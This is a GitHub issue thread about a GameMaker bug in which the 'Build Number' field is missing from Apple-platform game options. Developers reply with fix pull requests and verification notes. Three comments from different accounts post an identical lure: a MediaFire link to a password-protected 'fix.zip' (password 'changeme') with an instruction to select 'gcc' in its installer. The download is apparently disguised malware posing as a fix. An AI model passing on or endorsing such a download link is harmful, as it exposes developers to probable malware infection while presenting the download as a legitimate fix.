### ISSUE TITLE
Game Options: [iOS, tvOS, macOS] Newer "Build Number" field has not been added to 2022.0.3 RC1

### ISSUE THREAD

**Issue by DiasFranciscoA** [YoYoGames/GameMaker-Bugs#7431]
### Description

Just as the title describes the game options for iOS, tvOS and macOS are missing build number (image below is from Beta):

![image](https://github.com/user-attachments/assets/5f999fc2-1448-4f26-be7f-8100b56c558a)

An empty build seems to fail without it. 

### Steps To Reproduce

1. Start GameMaker
2. Build empty project for iOS, tvOS or macOS
3. See the issue

### How reliably can you recreate this issue using your steps above?

Always

### Which version of GameMaker are you reporting this issue for?

2022.0.2 (LTS)

### Which operating system(s) are you seeing the problem on?

Windows 10

### Are you running GameMaker from inside your Steam library?

No

### Contact Us Package Attached?

- [X] I have attached my Contact Us Package

### Sample Project Added?

- [ ] I have included a small sample project

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by stuckie** [comment]
LTS Runtime: https://github.com/YoYoGames/GameMaker/pull/4326
LTS CoreResources: https://github.com/YoYoGames/CoreResources/pull/300
LTS IDE: https://github.com/YoYoGames/YoYoStudio/pull/10531

August ProjectTool: https://github.com/YoYoGames/ProjectTool/pull/93
August ProjectTool submodule: https://github.com/YoYoGames/GameMaker/pull/4325

Additional LTS cherry-pick for the Option Adapters so that it actually shows up in the IDE: https://github.com/YoYoGames/YoYoStudio/commit/49d28a2329e0a27a172bb075720b6cf2b7f49968

**Comment by sihammill** [comment]
Verified in Beta IDE v2024.800.0.618 Beta Runtime v2024.800.0.642

**Comment by scott-dunbar** [comment]
Erroneously verified for beta, issue still present in LTSr3, though field exists the text string is missing

IDE 2022.0.3.66 Runtime 2022.0.3.79

MacOS:
![image](https://github.com/user-attachments/assets/74c84462-39ad-488a-8550-63172368cba1)

windows: 
![image](https://github.com/user-attachments/assets/6dcb8c9c-2ee3-4f1b-a8ed-0193f8e6d1f3)

**Comment by sihammill** [comment]
Fix appears to fine now in LTS IDE v2022.0.3.67  Runtime v2022.0.3.80
